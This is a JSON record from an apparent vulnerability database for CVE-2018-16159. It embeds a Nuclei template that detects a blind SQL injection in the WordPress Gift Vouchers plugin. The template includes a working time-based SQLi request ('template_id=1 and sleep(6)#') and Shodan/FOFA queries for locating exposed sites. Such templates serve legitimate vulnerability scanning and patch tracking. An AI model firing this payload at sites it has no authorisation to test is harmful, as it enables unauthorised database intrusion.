{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2018-16159/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2018-16159/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2018-16159/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2018-16159/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2018-16159/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2018-16159"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2018-16159"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2018/CVE-2018-16159.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2018-16159\n\ninfo:\n  name: WordPress Gift Voucher <4.1.8 - Blind SQL Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    WordPress Gift Vouchers plugin before 4.1.8 contains a blind SQL injection vulnerability via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.\n  remediation: Fixed in version 4.1.8.\n  reference:\n    - https://wpscan.com/vulnerability/9117\n    - https://wordpress.org/plugins/gift-voucher/\n    - https://www.exploit-db.com/exploits/45255/\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-16159\n    - https://wpvulndb.com/vulnerabilities/9117\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2018-16159\n    cwe-id: CWE-89\n    epss-score: 0.49918\n    epss-percentile: 0.98849\n    cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: codemenschen\n    product: gift_vouchers\n    framework: wordpress\n    shodan-query: http.html:\"/wp-content/plugins/gift-voucher/\"\n    fofa-query: body=\"/wp-content/plugins/gift-voucher/\"\n  tags: time-based-sqli,cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 10s\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n        action=wpgv_doajax_front_template&template_id=1 and sleep(6)#\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=6'\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains(body, \"images\") && contains(body, \"title\")'\n        condition: and\n# digest: 4a0a00473045022032913a3f02baef68675b44aba09a34397b291be2f650c47e136bd574b03a39ef0221008760e0f713c58f628553f257a6e24b541fd8429a212a02dc5e31b37415378110:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2018-16159"
}